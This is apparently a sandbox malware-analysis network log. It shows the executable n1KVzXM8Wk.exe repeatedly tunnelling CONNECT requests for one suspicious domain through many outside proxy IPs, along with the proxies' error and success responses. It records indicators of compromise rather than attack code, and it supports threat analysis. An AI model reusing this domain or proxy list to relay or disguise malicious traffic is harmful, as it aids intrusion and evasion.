                                                                                                      1174192.168.2.45333193.190.24.1194436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.269500971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1175192.168.2.453273185.217.143.23806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.270471096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.473562956 CET327INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                      Date: Fri, 23 Feb 2024 08:45:25 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1176192.168.2.453302134.122.26.11806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.279099941 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.680490017 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.178329945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.866271019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.178946972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.475153923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.680676937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.178500891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.178299904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1177192.168.2.453068159.203.5.54582496812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.294298887 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.365767002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.366292000 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.368577957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:49.381159067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:01.381130934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:13.443686008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1178192.168.2.453246222.220.102.15980006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.296752930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:55.679311991 CET303INHTTP/1.1 502 Bad Gateway
                                                                                                      Server: openresty
                                                                                                      Date: Fri, 23 Feb 2024 08:45:55 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 154
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>openresty</center></body></html>
                                                                                                      Feb 23, 2024 09:45:58.696147919 CET303INHTTP/1.1 502 Bad Gateway
                                                                                                      Server: openresty
                                                                                                      Date: Fri, 23 Feb 2024 08:45:55 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 154
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>openresty</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1179192.168.2.453370200.111.182.64436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.305859089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1180192.168.2.453372200.111.182.64436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.308154106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1181192.168.2.453374200.111.182.64436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.324359894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1182192.168.2.453375200.111.182.64436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.331967115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1183192.168.2.453320162.243.102.20797646812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.341022015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1184192.168.2.453327104.17.62.87806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.355407000 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.443747997 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:25 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1185192.168.2.453342104.16.224.33806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.369024038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.455879927 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:25 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1186192.168.2.453029103.68.207.34836812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.378165007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.443772078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1187192.168.2.45330868.71.249.153486066812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.378309965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1188192.168.2.45329695.66.138.2188806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.401320934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1189192.168.2.45251979.143.187.5817306812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.407166004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.475034952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.475318909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.475171089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1190192.168.2.453378104.19.83.128806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.425653934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.513187885 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:25 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1191192.168.2.453299154.236.176.2819766812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.429327965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.055160999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.834816933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.333651066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.334750891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.334739923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.334779024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.266365051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:55.131248951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192192.168.2.45331965.109.152.8888886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.440218925 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.629354000 CET255INHTTP/1.1 503 Service Unavailable
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Date: Fri, 23 Feb 2024 08:45:25 GMT
                                                                                                      Content-Length: 88
                                                                                                      Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 6f 6e 20 31 32 37 2e 30 2e 30 2e 31 3a 35 33 3a 20 6e 6f 20 73 75 63 68 20 68 6f 73 74 0a
                                                                                                      Data Ascii: dial tcp: lookup heygirlisheeverythingyouwantedinaman.com on 127.0.0.1:53: no such host


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1193192.168.2.450663139.9.119.20806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.483931065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.794040918 CET641INHTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 522<html><head><meta http-equiv="Content-Type" content="textml;charset=GB2312" /><style>body{background-color:#FFFFFF}</style> <title>167.17</title><script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://114.115.192.246:9080/error.html"; }</script> </head><body><iframe style="width:100%; height:100%;" id="mainFrame" src="" frameborder="0" scrolling="no"/></body></html
                                                                                                      Data Raw:
                                                                                                      Data Ascii:


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1194192.168.2.45250543.154.110.16131286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.529436111 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.680375099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.681669950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.682589054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:58.202316999 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1195192.168.2.453298175.183.82.22181936812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.554795980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1196192.168.2.452536103.235.66.19856786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.554908037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1197192.168.2.45338472.167.222.113504716812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.582094908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.055160046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.589605093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.556019068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.292618036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.061141014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.844747066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.348170996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.266340971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1198192.168.2.45338850.63.12.10129536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.596038103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
